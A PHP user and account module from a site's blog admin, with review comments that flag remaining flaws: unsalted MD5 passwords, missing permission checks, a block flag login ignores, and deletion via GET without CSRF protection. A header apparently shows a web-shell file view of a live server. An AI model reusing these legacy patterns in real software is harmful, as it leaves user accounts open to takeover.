Linux www.koreapackagetour.com 2.6.32-042stab145.3 #1 SMP Thu Jun 11 14:05:04 MSK 2020 x86_64

Path : /home/admin/public_html/modules-bak/blog/
Current File : /home/admin/public_html/modules-bak/blog/mod_user.php

<?
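/**
 * User/account module: module access checks, visitor-session bookkeeping,
 * login/logout and account create/edit/delete.
 *
 * Review notes that apply to the whole class:
 *  - Passwords are stored and compared as unsalted MD5. That is kept here
 *    because the existing rows in `users` use it; migrating to
 *    password_hash()/password_verify() needs a data migration and is the
 *    first thing to schedule.
 *  - Every value concatenated into SQL by this class goes through sqlQuote().
 *    Values handed to the inherited Insert()/Update()/check_data()/
 *    check_data_edit()/getRow() helpers are passed unchanged, because those
 *    helpers are not visible here -- NOTE(review): confirm they escape.
 *  - add_new_account() and edit_user() perform no permission check of their
 *    own (del_user() does). NOTE(review): confirm the caller enforces one.
 */
class user extends MySql
{
	/**
	 * Escape a value for use inside a single-quoted SQL string literal.
	 *
	 * Uses the legacy mysql extension, matching the mysql_fetch_array() calls
	 * already made by this class. NOTE(review): this relies on the parent
	 * class having an open connection, and if magic_quotes_gpc is enabled on
	 * the host, request values arrive pre-slashed and will be escaped twice
	 * (fails safe: the lookup simply does not match).
	 *
	 * @param mixed $value scalar value to embed in a query
	 * @return string escaped text, without the surrounding quotes
	 */
	private function sqlQuote($value)
	{
		return mysql_real_escape_string((string) $value);
	}

	/**
	 * Escape a value for use inside a quoted JavaScript string that is itself
	 * printed inside a <script> element.
	 *
	 * Works on single bytes only, so it is safe for any ASCII-compatible page
	 * encoding. "<", ">" and "&" are hex-escaped so the value cannot close the
	 * script element.
	 *
	 * @param mixed $value text to embed
	 * @return string escaped text, without the surrounding quotes
	 */
	private function jsString($value)
	{
		return strtr((string) $value, array(
			'\\' => '\\\\',
			"'"  => "\\'",
			'"'  => '\\"',
			"\r" => '\\r',
			"\n" => '\\n',
			'<'  => '\\x3C',
			'>'  => '\\x3E',
			'&'  => '\\x26',
		));
	}

	/**
	 * Read one scalar field from $_POST.
	 *
	 * @param string $key field name
	 * @return string|null the submitted value; null when the field is missing
	 *                     or was submitted as an array (every field read by
	 *                     this class is used as a scalar)
	 */
	private function postValue($key)
	{
		if (!isset($_POST[$key]) || is_array($_POST[$key])) {
			return null;
		}
		return $_POST[$key];
	}

	/**
	 * Tell whether the current user may use a module.
	 *
	 * Reads the global $user_login array. 'Administrator' access is granted
	 * unconditionally; otherwise the user must be logged in and a row must
	 * exist in `modules` for the (lower-cased) module name and the user type.
	 *
	 * @param string $module module name
	 * @return bool
	 */
	public function Access($module)
	{
		global $user_login;

		$module = strtolower($module);

		if (isset($user_login['Access']) && $user_login['Access'] == 'Administrator') {
			return true;
		}
		if (!isset($user_login['Login_Status']) || $user_login['Login_Status'] != 'True') {
			return false;
		}

		$type = isset($user_login['Type']) ? $user_login['Type'] : '';
		// Both values are escaped: $module comes from the caller and the type
		// comes from session data.
		$this->Query("SELECT * FROM modules WHERE module_name='".$this->sqlQuote($module)."'  AND usertype_access_id='".$this->sqlQuote($type)."'");

		return $this->numRows() != 0;
	}

	/**
	 * Record the current visitor in `useronline` and `session`, after purging
	 * old `session` rows.
	 *
	 * A row is added only when no `session` row exists yet for this client IP
	 * and user name ('Guest' when nobody is logged in).
	 *
	 * @return void
	 */
	public function Initial()
	{
		global $user_login;

		$client_ip    = getClientIp();
		$SessionID    = md5($this->getSessionID());
		$current_time = time();

		if (isset($user_login['Login_Status']) && $user_login['Login_Status'] == true) {
			$su = $user_login['Login'];
		} else {
			$su = "Guest";
		}

		// NOTE(review): 21600000 seconds is 250 days; this looks like a
		// six-hour window written in milliseconds -- confirm the intended
		// retention before changing it.
		$time = (int) (time() - 21600000);
		$this->setQuery("DELETE FROM session  WHERE session_time<$time");
		$this->freeQuery();

		// getClientIp() is defined elsewhere; if it honours proxy headers the
		// value is client-controlled, so it is escaped like any other input.
		$ip_sql = $this->sqlQuote($client_ip);
		$su_sql = $this->sqlQuote($su);

		$this->setQuery("SELECT * FROM session  WHERE session_ip='".$ip_sql."' AND session_user='".$su_sql."'");
		$this->QueryReturn();
		if ($this->numRows() == 0) {
			// The query string is client-controlled and is stored as-is;
			// NOTE(review): confirm Insert() escapes values, and escape this
			// field again wherever `useronline` is displayed.
			$useronline = array(
				'ip'   => $client_ip,
				'user' => $su,
				'time' => $current_time,
				'url'  => isset($_SERVER['QUERY_STRING']) ? $_SERVER['QUERY_STRING'] : '',
			);
			$this->Insert('useronline', $useronline);

			$this->setQuery("INSERT INTO session  (session_id,session_time,session_ip,session_user) VALUES ('$SessionID','$current_time','".$ip_sql."','".$su_sql."')");
			if (!$this->QueryReturn()) {
				Error($this->mysqlError());
			}
		}
	}

	/**
	 * Build a random-looking identifier: 20-40 alphanumeric characters
	 * followed by the current Unix timestamp.
	 *
	 * mt_rand() is not a cryptographic generator, so the result is a tracking
	 * label only and must not be relied on as an unguessable token.
	 *
	 * @return string
	 */
	public function getSessionID()
	{
		// No explicit mt_srand(): seeding from microtime() narrowed the
		// generator to about a million possible states and reseeded it for
		// every other caller in the request.
		$allchar  = "abcdefghijklnmopqrstuvwxyzABCDEFGHIJKLNMOPQRSTUVWXYZ0123456789";
		// The upper bound was 62, one past the last index of the 62-character
		// alphabet, which occasionally appended nothing.
		$last     = strlen($allchar) - 1;
		$pass_len = mt_rand(20, 40);

		$str = "";
		for ($i = 0; $i < $pass_len; $i++) {
			$str .= substr($allchar, mt_rand(0, $last), 1);
		}

		return $str.time();
	}

	/**
	 * Check a user name and password and, on success, populate
	 * $_SESSION['user_login'] and redirect to admin.php.
	 *
	 * On failure a jAlert script is printed and the request ends.
	 *
	 * @param string $UserNameLogin     submitted user name
	 * @param string $UserPasswordLogin submitted clear-text password
	 * @return void
	 */
	public function login($UserNameLogin, $UserPasswordLogin)
	{
		global $user_login;

		// Unsalted MD5 is kept only for compatibility with the stored hashes
		// (see the class comment).
		$md5Pass = md5($UserPasswordLogin);

		$this->setQuery("SELECT * FROM users where user_login= '".$this->sqlQuote($UserNameLogin)."' AND user_password = '".$md5Pass."'");
		$result = $this->QueryReturn();

		$arr = false;
		if ($result && $this->numRows() != 0) {
			$arr = mysql_fetch_array($result);
		}
		if (!$arr) {
			echo "<script>jAlert('Username or Password INCORRECT', 'Login Error');</script>";
			exit();
		}

		$this->setQuery("SELECT * FROM user_profile where user_id= '".$this->sqlQuote($arr['user_id'])."'");
		$result2 = $this->QueryReturn();
		$arr2    = $result2 ? mysql_fetch_array($result2) : false;

		// NOTE(review): edit_user() writes users.user_block, but nothing here
		// consults it, so a blocked account can still sign in. Confirm whether
		// that check was disabled on purpose.

		// Issue a fresh session id at the privilege change so an id known
		// before login is not carried into the authenticated session.
		if (session_id() != '' && !headers_sent()) {
			session_regenerate_id(true);
		}

		$_SESSION["user_login"]['ID']           = $arr['user_id'];
		$_SESSION["user_login"]['Login_Status'] = "True";
		$_SESSION["user_login"]['Login']        = $arr['user_login'];
		// NOTE(review): the password hash is kept in the session because other
		// code may read it; drop it once no reader remains.
		$_SESSION["user_login"]['Password']     = $arr['user_password'];
		$_SESSION["user_login"]['Type']         = $arr['user_type'];
		$_SESSION["user_login"]['Nickname']     = ($arr2 && isset($arr2['nickname'])) ? $arr2['nickname'] : null;
		$_SESSION["user_login"]['Name']         = $arr['user_name'];
		// The debug print_r() of the session array was removed: it wrote the
		// password hash and account details into the response body.

		// user_login is read back from the database but is still escaped,
		// since stored data is not trusted either.
		$this->setQuery("UPDATE users SET user_last_visit_time='".time()."', user_last_login_ip='".$this->sqlQuote(getClientIp())."' WHERE user_login='".$this->sqlQuote($arr['user_login'])."'");
		$this->freeQuery();

		echo"<meta http-equiv=\"refresh\" content=\"0;url=admin.php\">";
	}

	/**
	 * Walk the `usertype` parent chain and return the id of the top-most
	 * ancestor of a user type.
	 *
	 * @param mixed $group usertype_id to start from
	 * @return mixed usertype_id of the root row, or null when the row is
	 *               missing
	 */
	public function getRootParent($group)
	{
		$visited = array();
		$current = $group;

		while (true) {
			$parent = $this->getRow('usertype', "WHERE usertype_id='".$this->sqlQuote($current)."'");
			$visited[(string) $current] = true;

			$has_parent = isset($parent['usertype_parent']) && $parent['usertype_parent'] != '';
			// Stop at the root, and also when the chain loops back on itself,
			// so corrupt data cannot cause endless recursion.
			if (!$has_parent || isset($visited[(string) $parent['usertype_parent']])) {
				return isset($parent['usertype_id']) ? $parent['usertype_id'] : null;
			}
			$current = $parent['usertype_parent'];
		}
	}

	/**
	 * End the current session and redirect to index.php.
	 *
	 * @return void
	 */
	public function logout()
	{
		// Start the session only if the request has not done so already.
		if (session_id() == '') {
			session_start();
		}
		// Clear the data in memory as well, so nothing later in this request
		// still sees a logged-in user.
		$_SESSION = array();
		session_destroy();

		echo"<meta http-equiv=\"refresh\" content=\"0;url=index.php\">";
	}

	/**
	 * Create a row in `users` from the submitted form
	 * (username, password, password2, name, cat_id).
	 *
	 * Prints a script alert and ends the request on validation failure;
	 * otherwise redirects to admin.php with msg=1 (created) or msg=0 (insert
	 * failed).
	 *
	 * NOTE(review): user_type is taken directly from the form and no
	 * permission check happens here -- confirm the caller restricts who may
	 * reach this method.
	 *
	 * @return void
	 */
	public function add_new_account()
	{
		$username  = $this->postValue('username');
		$password  = $this->postValue('password');
		$password2 = $this->postValue('password2');
		$name      = $this->postValue('name');
		$cat_id    = $this->postValue('cat_id');

		$data = array(
			'user_login'    => $username,
			'user_password' => md5((string) $password),
			'user_name'     => $name,
			'user_type'     => $cat_id,
		);

		$chk_user = $this->check_data('users', 'user_login', $username);
		if ($chk_user == 1) {
			echo "<SCRIPT>alert('Username is already in use'); window.history.back(); </SCRIPT>\n";
			exit();
		}

		// Strict comparison: with "!=" two different numeric-looking strings
		// (for example "1e3" and "1000") compare as equal.
		if ((string) $password !== (string) $password2) {
			echo "<SCRIPT>alert('รหัสผ่านไม่ตรงกัน'); window.history.back(); </SCRIPT>\n";
			exit();
		}

		// The password is now required too; previously two empty password
		// fields created an account with the hash of the empty string.
		if ($name != '' && $username != '' && $cat_id != '' && (string) $password !== '') {
			if ($this->Insert('users', $data)) {
				echo"<meta http-equiv=\"refresh\" content=\"0;url=admin.php?mod=blog&msg=1\">";
			} else {
				echo"<meta http-equiv=\"refresh\" content=\"0;url=admin.php?mod=blog&msg=0\">";
			}
		} else {
			echo "<SCRIPT>alert('Require Fields Data'); window.history.back(); </SCRIPT>\n";
			exit();
		}
	}

	/**
	 * Update a `users` row, its `user_profile` row and optionally its
	 * password and photo from the submitted form.
	 *
	 * Redirects to admin.php with msg=2 on success or msg=6 when the `users`
	 * update fails; prints a script alert and ends the request on validation
	 * failure.
	 *
	 * NOTE(review): the target account is chosen by the submitted user_id and
	 * the form also sets user_type and user_block, with no permission check
	 * here -- confirm the caller limits this to authorised users.
	 *
	 * @return void
	 */
	public function edit_user()
	{
		$user_id    = $this->postValue('user_id');
		$username   = $this->postValue('username');
		$name       = $this->postValue('name');
		$lastname   = $this->postValue('lastname');
		$password   = $this->postValue('password');
		$repassword = $this->postValue('repassword');

		$user_where = "where user_id='".$this->sqlQuote($user_id)."'";

		$chk_user = $this->check_data_edit('users', 'user_login', $username, 'user_id', $user_id);

		$this->Query("SELECT name,lastname FROM user_profile  WHERE  user_id!='".$this->sqlQuote($user_id)."' AND name='".$this->sqlQuote($name)."' AND lastname='".$this->sqlQuote($lastname)."'");
		$chk_name_lastname = $this->numRows();

		if ($chk_user == 1) {
			echo "<SCRIPT>alert('Username is already in use'); window.history.back(); </SCRIPT>\n";
			exit();
		}

		// "> 0" rather than "== 1": two or more existing matches are still a
		// duplicate.
		if ($chk_name_lastname > 0) {
			// The submitted names are escaped for the script context before
			// being printed back to the browser.
			echo "<SCRIPT>alert('ชื่อ-นามสกุล ".$this->jsString($name)."  ".$this->jsString($lastname)." นี้มีในระบบแล้ว'); window.history.back(); </SCRIPT>\n";
			exit();
		}

		if ($password != '') {
			if ((string) $password !== (string) $repassword) {
				echo "<SCRIPT>alert('รหัสผ่านไม่ตรงกัน'); window.history.back(); </SCRIPT>\n";
				exit();
			}
			$pass = md5((string) $password);
			$this->Query("update users set user_password='$pass' ".$user_where);
		}

		if ($username == '') {
			echo "<SCRIPT>alert('Require Fields Data'); window.history.back(); </SCRIPT>\n";
			exit();
		}

		$data = array(
			'user_login' => $username,
			'user_name'  => $name,
			'user_email' => $this->postValue('email1'),
			'user_type'  => $this->postValue('usertype'),
			'user_block' => $this->postValue('block'),
		);

		if (!$this->Update('users', $data, $user_where)) {
			echo"<meta http-equiv=\"refresh\" content=\"0;url=admin.php?mod=blog&msg=6\">";
			return;
		}

		$chk = $this->check_data('user_profile', 'user_id', $user_id);

		// NOTE(review): the original passed an undefined $limit_size here,
		// i.e. null. It is made explicit; confirm what size limit
		// uploadfiles() applies in that case, and that it validates the file
		// type and sanitises the name it derives from the user name.
		$limit_size = null;
		$picname    = uploadfiles('photo', $username, '../user_photo', $limit_size, 1);
		$photo      = (is_array($picname) && isset($picname[0])) ? $picname[0] : '';

		if ($photo == '') {
			// No new upload: keep the name sent back by the form.
			// NOTE(review): edit_photo is client-supplied and is stored as-is;
			// validate it wherever the stored name is turned into a path.
			$photo = $this->postValue('edit_photo');
		} else {
			make_thumb("../user_photo/".$photo, '../user_photo/thumbs/'.$photo, 150);
		}

		$this->Update('user_profile', array('photo' => $photo), $user_where);

		$profile = array(
			'name'         => $name,
			'lastname'     => $lastname,
			'nickname'     => $this->postValue('nickname'),
			'day'          => $this->postValue('day'),
			'month'        => $this->postValue('month'),
			'year'         => $this->postValue('year'),
			'gender'       => $this->postValue('gender'),
			'address'      => $this->postValue('address'),
			'road'         => $this->postValue('road'),
			'sub_district' => $this->postValue('sub_district'),
			'district'     => $this->postValue('district'),
			'province'     => $this->postValue('province'),
			'zipcode'      => $this->postValue('zipcode'),
			'telephone'    => $this->postValue('telephone'),
			'mobile'       => $this->postValue('mobile'),
			'email1'       => $this->postValue('email1'),
			'email2'       => $this->postValue('email2'),
			'job'          => $this->postValue('job'),
		);

		if ($chk != 0) {
			$this->Update('user_profile', $profile, $user_where);
		} else {
			// No profile row yet: create it, including the photo and the key.
			$this->Insert('user_profile', array_merge(
				array('photo' => $photo),
				$profile,
				array('user_id' => $user_id)
			));
		}

		// The debug "echo $picname[0]" lines were removed: they printed a
		// request-supplied file name into the page without escaping.
		echo"<meta http-equiv=\"refresh\" content=\"0;url=admin.php?mod=blog&msg=2\">";
	}

	/**
	 * Delete a user and the matching profile row. Only callers whose session
	 * user type is 1 may delete.
	 *
	 * Redirects to admin.php with msg=3 (deleted), msg=5 (delete failed) or
	 * msg=4 (not permitted).
	 *
	 * NOTE(review): the target id arrives in the query string, so a plain GET
	 * link changes state. Move this to POST with an anti-CSRF token.
	 *
	 * @return void
	 */
	public function del_user()
	{
		global $user_login;

		// Permission is checked before anything from the request is used; the
		// earlier unused lookup that ran ahead of this check was dropped.
		if (!isset($user_login['Type']) || $user_login['Type'] != 1) {
			echo"<meta http-equiv=\"refresh\" content=\"0;url=admin.php?mod=blog&msg=4\">";
			return;
		}

		$user_id = (isset($_GET['id']) && !is_array($_GET['id'])) ? $_GET['id'] : '';
		$id_sql  = $this->sqlQuote($user_id);

		$rs = $this->Query("delete from users where user_id='".$id_sql."'");
		if ($rs) {
			$this->Query("DELETE FROM user_profile WHERE user_id='".$id_sql."'");
			echo"<meta http-equiv=\"refresh\" content=\"0;url=admin.php?mod=blog&msg=3\">";
		} else {
			echo"<meta http-equiv=\"refresh\" content=\"0;url=admin.php?mod=blog&msg=5\">";
		}
	}
}//end class user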


	?>
